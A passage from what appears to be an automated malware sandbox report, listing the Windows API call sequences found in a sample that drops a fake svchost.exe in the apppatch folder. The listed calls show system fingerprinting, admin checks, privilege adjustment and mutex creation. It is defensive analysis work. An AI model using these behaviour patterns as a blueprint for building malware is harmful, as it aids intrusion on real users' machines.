ile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFil
e,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 1_2_02C94B00
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F64B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFi
le,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 5_2_02F64B00
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02554B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFi
le,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 6_2_02554B00
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025C4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFi
le,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 8_2_025C4B00
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403A20
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,0_2_00402D30
    Source: C:\Windows\apppatch\svchost.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,1_2_00403A20
    Source: C:\Windows\apppatch\svchost.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,1_2_00402D30
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,1_2_02CA5720
    Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleH
andleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,1_2_02CA6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,1_2_02CB2BB0
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,StrStrIA,1_2_02CB2B40
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,1_2_02C9D970
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,1_2_02C91170
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,1_2_02CB1690
    Source: C:\Windows\apppatch\svchost.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,1_2_02C91660
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,1_2_02C93610
    Source: C:\Windows\apppatch\svchost.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,1_2_02CACE10
    Source: C:\Windows\apppatch\svchost.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,1_2_02C97FD0
    Source: C:\Windows\apppatch\svchost.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,1_2_02CB3F50
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,1_2_02CB3CE0
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,1_2_02CB1460
    Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,1_2_02CB25C0
    Source: C:\Windows\apppatch\svchost.exeCode function: GetUserNameA,memset,StrStrIA,1_2_02CAADE0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,5_2_02F76CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,5_2_02F82BB0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,StrStrIA,5_2_02F82B40
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,5_2_02F61170
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,5_2_02F6D970
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,5_2_02F81690
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,5_2_02F61660
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,5_2_02F63610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,5_2_02F7CE10
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,5_2_02F67FD0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,5_2_02F83F50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,5_2_02F75720
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,5_2_02F83CE0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,5_2_02F81460
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetUserNameA,memset,StrStrIA,5_2_02F7ADE0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,5_2_02F825C0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,6_2_02566CA0
